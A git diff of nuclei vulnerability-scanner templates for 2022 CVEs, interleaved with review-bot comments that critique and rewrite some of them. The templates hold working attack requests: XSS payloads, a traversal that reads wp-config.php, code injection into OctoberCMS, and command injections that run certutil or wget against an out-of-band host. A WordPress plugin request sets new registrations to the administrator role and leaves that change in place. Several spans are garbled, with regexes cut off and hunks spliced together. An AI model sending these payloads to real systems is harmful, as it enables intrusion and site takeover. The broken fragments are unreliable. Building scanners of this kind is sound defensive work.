@@ -0,0 +1,31 @@ +id: CVE-2022-0776 +info: + name: RevealJS postMessage XSS + author: LogicalHunter + severity: medium + description: Cross-site Scripting (XSS) - DOM in GitHub repository hakimel/reveal.js prior to 4.3.0. + reference: + - https://hackerone.com/reports/691977 + - https://github.com/hakimel/reveal.js/pull/3137 + - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/ + classification: + cve-id: CVE-2022-0776 + tags: cve,cve2022,headless,postmessage,revealjs +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: extract + args: + code: | + () => { + return (Reveal.VERSION <= "3.8.0" || Reveal.VERSION < "4.3.0") + } + matchers: + - type: word + part: extract + words: + - "true" diff --git a/nuclei-templates/CVE-2022/CVE-2022-0870.yaml b/nuclei-templates/CVE-2022/CVE-2022-0870.yaml deleted file mode 100644 index b1aa655570..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0870.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-0870 -info: - name: Gogs - SSRF - author: Akincibor - severity: medium - description: Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5. - reference: - - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0870 - - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb - - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-0870 - cwe-id: CWE-918 - metadata: - shodan-query: http.favicon.hash:-449283196 - tags: cve,cve2022,ssrf,gogs -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - '
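Review bot: The headless script compares `Reveal.VERSION` as a string: `Reveal.VERSION < "4.3.0"` is a lexicographic comparison, so a later release such as `4.10.0` sorts below `4.3.0` (`"1" < "3"`) and is reported vulnerable, and the first clause `<= "3.8.0"` is already covered by the second. Compare the dotted components numerically instead; the rewritten `code:` block is below. Whether `Reveal` is defined on every loaded page is not shown here — a missing global would throw inside the script instead of returning `false`, which the `words: - "true"` matcher treats as no match, so that is tolerable but worth knowing.
```yaml
      code: |
        () => {
          const parse = (s) => String(s).split('.').map((p) => parseInt(p, 10) || 0);
          const cur = parse(Reveal.VERSION);
          const fixed = [4, 3, 0];
          for (let i = 0; i < fixed.length; i++) {
            if ((cur[i] || 0) !== fixed[i]) return (cur[i] || 0) < fixed[i];
          }
          return false;
        }
# … unchanged: matchers …
```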
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - - type: regex - group: 1 - regex: - - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - - type: dsl - dsl: - - compare_versions(version, '< 0.12.5') - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0952.yaml b/nuclei-templates/CVE-2022/CVE-2022-0952.yaml deleted file mode 100644 index 3e068044db..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0952.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2022-0952 -info: - name: Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update - author: random-robbie - severity: high - description: | - The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin - reference: - - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b - - https://nvd.nist.gov/vuln/detail/CVE-2022-0952 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-0952 - cwe-id: CWE-862 - metadata: - verified: "true" - tags: cve,cve2022,wordpress,wp,wp-plugin,sitemap -requests: - - raw: - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"users_can_register":"1"} - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"default_role":"administrator"} - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"users_can_register":"0"} - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(all_headers, "application/json")' - - "status_code == 200" - - "contains(body_1, 'users_can_register')" - - "contains(body_2, 'default_role')" - condition: and 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-0954.yaml b/nuclei-templates/CVE-2022/CVE-2022-0954.yaml
new file mode 100644
index 0000000000..09542ab5a1
--- /dev/null
+++ b/nuclei-templates/CVE-2022/CVE-2022-0954.yaml
@@ -0,0 +1,57 @@
+id: CVE-2022-0954
+
+info:
+ name: Microweber - Cross-site Scripting
+ author: amit-jd
+ severity: medium
+ description: |
+ Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.
+ reference:
+ - https://github.com/advisories/GHSA-8c76-mxv5-w4g8
+ - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
+ - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0954
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-0954
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,xss,microweber,huntr
+
+requests:
+ - raw:
+ - |
+ POST /api/user_login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}&password={{password}}
+
+ - |
+ POST /api/save_option HTTP/2
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Referer: {{BaseURL}}/admin/view:shop/action:options
+
+ option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
+
+ - |
+ POST /module/ HTTP/2
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Referer: {{BaseURL}}/admin/view:shop/action:options
+
+ module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
+
+ cookie-reuse: true
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_2,"true")'
+ - contains(body_3,'\">\" placeholder=\"Use default')
+ - 'contains(all_headers_3,"text/html")'
+ - 'status_code_3==200'
+ condition: and
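Review bot: The second and third raw requests use `HTTP/2` in the request line while the first uses `HTTP/1.1` and every other raw template in this commit uses `HTTP/1.1`; whether the raw request parser honours an `HTTP/2` request line is not visible here, and mixing versions inside one `cookie-reuse` sequence is at least inconsistent, so use `HTTP/1.1` on all three. The template also persists its probe: the `save_option` step writes the `checkout_url` option and no later request restores it, so a scanned shop keeps the injected value after the check — say so in `description` or add a final request that resets the option to its previous value. `contains(body_2,"true")` as the success check for the save step is weak (any body containing `true` passes); if the API returns a fuller response, match on that instead.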
diff --git a/nuclei-templates/CVE-2022/CVE-2022-0963.yaml b/nuclei-templates/CVE-2022/CVE-2022-0963.yaml
deleted file mode 100644
index 7982c258c3..0000000000
--- a/nuclei-templates/CVE-2022/CVE-2022-0963.yaml
+++ /dev/null
@@ -1,64 +0,0 @@ -id: CVE-2022-0963 -info: - name: Microweber > 1.2.12 - Cross-Site Scripting - author: amit-jd - severity: medium - description: | - Microweber prior to 1.2.12 allows unrestricted upload of XML files, which malicious actors can exploit to cause a stored cross-site scripting attack. - reference: - - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/ - - https://github.com/advisories/GHSA-q3x2-jvp3-wj78 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0963 - - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2022-0963 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2022,xss,microweber,cms,authenticated -requests: - - raw: - - | - POST /api/user_login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - | - POST /plupload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034 - Referer: {{BaseURL}}admin/view:modules/load_module:files - - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="name" - - {{randstr}}.xml - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="chunk" - - 0 - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="chunks" - - 1 - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="file"; filename="blob" - Content-Type: application/octet-stream - - alert(document.domain) - -----------------------------59866212126262636974202255034-- - - | - GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1 - Host: {{Hostname}} - req-condition: true - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 
'contains(body_3,"alert(document.domain)")' - - 'status_code_3==200' - - 'contains(body_2,"bytes_uploaded")' - condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-1020.yaml b/nuclei-templates/CVE-2022/CVE-2022-1020.yaml new file mode 100644 index 0000000000..32720cd261 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1020.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-1020 +info: + name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call + author: Akincibor + severity: critical + description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. + reference: + - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1020 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-1020 + cwe-id: CWE-352,CWE-862 + tags: wp,wp-plugin,wordpress,cve,cve2022,unauth +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + option_key=a&perpose=update&callback=phpinfo + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1119.yaml b/nuclei-templates/CVE-2022/CVE-2022-1119.yaml new file mode 100644 index 0000000000..9f39aee98b --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1119.yaml 
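Review bot: The `name` attributes CVE-2022-1020 to "WordPress WooCommerce" itself, but the description and the `wpt_admin_update_notice_option` action (the `wpt_` prefix, and the wpscan reference) appear to point at a separate WooCommerce add-on plugin; the name should carry the plugin name exactly as the advisory gives it, since attributing it to WooCommerce core will mislead triage. The request invokes `phpinfo` on the target, which also discloses server configuration in the response; a one-line remark in `description` about that side effect would help operators decide where to run it. Unlike the other additions in this commit, the `info` block carries no `metadata` / `verified` entry.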
@@ -0,0 +1,35 @@ +id: CVE-2022-1119 +info: + name: WordPress Simple File List <3.2.8 - Local File Inclusion + author: random-robbie + severity: high + description: | + WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. + reference: + - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e + - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606 + - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1119 + cwe-id: CWE-22 + tags: cve,cve2022,lfi,wordpress,wp,wp-plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1221.yaml b/nuclei-templates/CVE-2022/CVE-2022-1221.yaml deleted file mode 100644 index ca0ab04ccb..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-1221.yaml +++ /dev/null 
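Review bot: The description is missing a word: `make it possible for unauthenticated attackers to retrieve arbitrary files`. In the request path the traversal is written as three `%2e%2e%2f` segments followed by `%2e%2e/wp-config.php`, mixing an encoded and a literal slash in the last step; if that is intentional (bypassing a specific normaliser) it deserves a comment, otherwise it should be encoded consistently. The template also lacks a `metadata` / `verified` entry, which the other templates in this commit provide.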
@@ -1,37 +0,0 @@ -id: CVE-2022-1221 -info: - name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting - author: veshraj - severity: medium - description: | - The Gwyn's Imagemap Selector Wordpresss plugin does not sanitize the id and class parameters before returning them back in attributes, leading to a Reflected Cross-Site Scripting. - reference: - - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1221 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: xss,wordpress,wp-plugin,wp,cve,cve2022 -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - " popup-" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1392.yaml b/nuclei-templates/CVE-2022/CVE-2022-1392.yaml new file mode 100644 index 0000000000..1cfaf712bd --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1392.yaml 
@@ -0,0 +1,34 @@ +id: CVE-2022-1392 +info: + name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion + author: Veshraj + severity: high + description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. + reference: + - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 + - https://packetstormsecurity.com/files/166534/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1392 + metadata: + verified: true + tags: cve,cve2022,lfi,wp-plugin,wp,wordpress,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "failed to open stream: No such file or directory" + - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1439.yaml b/nuclei-templates/CVE-2022/CVE-2022-1439.yaml new file mode 100644 index 0000000000..1ea71e54a9 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1439.yaml 
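Review bot: The body matcher requires the literal `failed to open stream: No such file or directory`, but PHP 8 capitalised these warnings to `Failed to open stream`, so vulnerable installations on PHP 8 will be reported as clean; adding `case-insensitive: true` to that word matcher avoids the false negative. The `classification` block has no `cwe-id`, while the sibling LFI template CVE-2022-1119 in this commit sets `cwe-id: CWE-22`. `verified: true` here is a bare boolean whereas other templates in the commit quote it as `"true"`; one form should be used across the repository.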
@@ -0,0 +1,34 @@ +id: CVE-2022-1439 +info: + name: Microweber Reflected Cross-Site Scripting + author: pikpikcu + severity: medium + description: Reflected XSS in microweber/microweber prior to 1.2.15. Execute Arbitrary JavaScript as the attacked user. It's the only payload I found working, you might need to press "tab" but there is probably a paylaod that runs without user interaction. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-1439 + - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/ + - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0 + - https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1439 + cwe-id: CWE-79 + metadata: + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2022,microweber,xss +requests: + - method: GET + path: + - '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "
' + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-21705.yaml b/nuclei-templates/CVE-2022/CVE-2022-21705.yaml new file mode 100644 index 0000000000..d48170c9cf --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-21705.yaml 
@@ -0,0 +1,94 @@ +id: CVE-2022-21705 +info: + name: OctoberCMS Authenticated Remote Code Execution + author: iPhantasmic + severity: high + description: | + Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area. + remediation: | + The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually. + reference: + - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe + - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 + - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-21705 + cwe-id: CWE-74 + tags: cve,cve2022,authenticated,rce,cms,octobercms,injection +requests: + - raw: + - | # to obtain session_key and token + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + - | # to perform authentication and obtain admin cookies + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} + - | # to inject php code in Markup editor and perform exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onSave + 
X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 + - | # to obtain theme + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onCreateTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&type=page + - | # to access the template page for generated exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onOpenTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm + cookie-reuse: true + extractors: + - type: xpath + name: session_key + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" + internal: true + # Obtain _session_key for current OctoberCMS session + - type: xpath + name: token + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" + internal: true + # Obtain _token for current OctoberCMS session + - type: regex + name: theme + part: body + group: 1 + regex: + - '

301 Moved Permanently

' - - - type: regex - part: location - regex: - - 'https?:\/\/(.*):' - - extractors: - - type: regex - part: location - group: 1 - regex: - - 'https?:\/\/(.*):' - -# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23881.yaml b/nuclei-templates/CVE-2022/CVE-2022-23881.yaml new file mode 100644 index 0000000000..84b802eba2 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-23881.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-23881 + +info: + name: zzzphp v2.1.0 RCE + author: pikpikcu + severity: critical + description: ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution (RCE) vulnerability via danger_key() at zzz_template.php. + reference: + - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md + - http://www.zzzcms.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 + tags: cve,cve2022,rce,zzzphp,zzzcms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-23881 + cwe-id: CWE-77 + +requests: + - raw: + - | + GET /?location=search HTTP/1.1 + Host: {{Hostname}} + Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 500 diff --git a/nuclei-templates/CVE-2022/cve-2022-23944.yaml b/nuclei-templates/CVE-2022/CVE-2022-23944.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-23944.yaml rename to nuclei-templates/CVE-2022/CVE-2022-23944.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-24124.yaml b/nuclei-templates/CVE-2022/CVE-2022-24124.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-24124.yaml rename to nuclei-templates/CVE-2022/CVE-2022-24124.yaml 
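Review bot: In the CVE-2022-23881 request the header is named `Cookies:`, which is not the HTTP cookie header; PHP populates `$_COOKIE` only from `Cookie:`, so unless zzzphp reads a custom `Cookies` header the injected `keys` value never reaches the vulnerable code and the template cannot match. The injected command is `certutil`, which exists only on Windows, so Linux deployments of zzzphp would produce a false negative even if the header were right; that platform assumption should at least be stated in `description`. `cvss-score: 9.80` is formatted differently from the `9.8` used by the other templates in this commit.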
diff --git a/nuclei-templates/CVE-2022/CVE-2022-24681.yaml b/nuclei-templates/CVE-2022/CVE-2022-24681.yaml deleted file mode 100644 index ae88561611..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24681.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2022-24681 -info: - name: ManageEngine ADSelfService - Stored XSS - author: Open-Sec - severity: medium - description: | - Zoho ManageEngine ADSelfService Plus before 6121 allows XSS via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screen. - reference: - - https://raxis.com/blog/cve-2022-24681 - - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 - - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html - - https://manageengine.com - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24681 - cwe-id: CWE-79 - tags: cve,cve2022,manageengine,xss,authenticated -requests: - - raw: - - | - POST /servlet/GetProductVersion HTTP/1.1 - Host: {{Hostname}} - extractors: - - type: regex - part: body - name: buildnumber - group: 1 - regex: - - '"BUILD_NUMBER":"([0-9]+)",' - internal: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(buildnumber, '< 6121') - - type: word - part: body - words: - - "ManageEngine" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24856.yaml b/nuclei-templates/CVE-2022/CVE-2022-24856.yaml new file mode 100644 index 0000000000..0bf893b39e --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-24856.yaml 
@@ -0,0 +1,30 @@ +id: CVE-2022-24856 +info: + name: Flyte Console <0.52.0 - Server-Side Request Forgery + author: pdteam + severity: high + description: | + FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. + reference: + - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9 + - https://github.com/flyteorg/flyteconsole/pull/389 + - https://hackerone.com/reports/1540906 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24856 + remediation: | + The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-24856 + cwe-id: CWE-918 + tags: cve,cve2022,flyteconsole,ssrf,oss +requests: + - method: GET + path: + - "{{BaseURL}}/cors_proxy/https://www.interact.sh" + matchers: + - type: word + words: + - "Interactsh Server" + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2486.yaml b/nuclei-templates/CVE-2022/CVE-2022-2486.yaml deleted file mode 100644 index 2c3533d673..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-2486.yaml +++ /dev/null 
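Review bot: The detection depends on the scanned host fetching a fixed third-party site (`https://www.interact.sh`) and on that site's page still containing the words `Interactsh Server`, which makes the template both brittle and noisy toward an unrelated server; the sibling CVE-2022-2488 template in this commit already shows the repository convention of pointing the SSRF at `{{interactsh-url}}` and matching on `interactsh_protocol`. The matcher also has no `part` and no status check, so any page mentioning that phrase would match. The rewrite below keeps the same request shape and only swaps the target and the matcher (assuming the proxy accepts an `http://` URL as it does `https://`).
```yaml
    path:
      - "{{BaseURL}}/cors_proxy/http://{{interactsh-url}}"
    matchers:
      - type: word
        part: interactsh_protocol  # confirms the server-side fetch reached the OOB endpoint
        words:
          - "http"
```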
@@ -1,34 +0,0 @@ -id: CVE-2022-2486 -info: - name: Wavlink Mesh.cgi - Remote Code Execution - author: For3stCo1d - severity: critical - description: | - A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used. - reference: - - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486 - - https://vuldb.com/?id.204537 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-2486 - cwe-id: CWE-78 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,iot,wavlink,router,rce,oast -requests: - - raw: - - | - GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - type: status - status: - - 500 diff --git 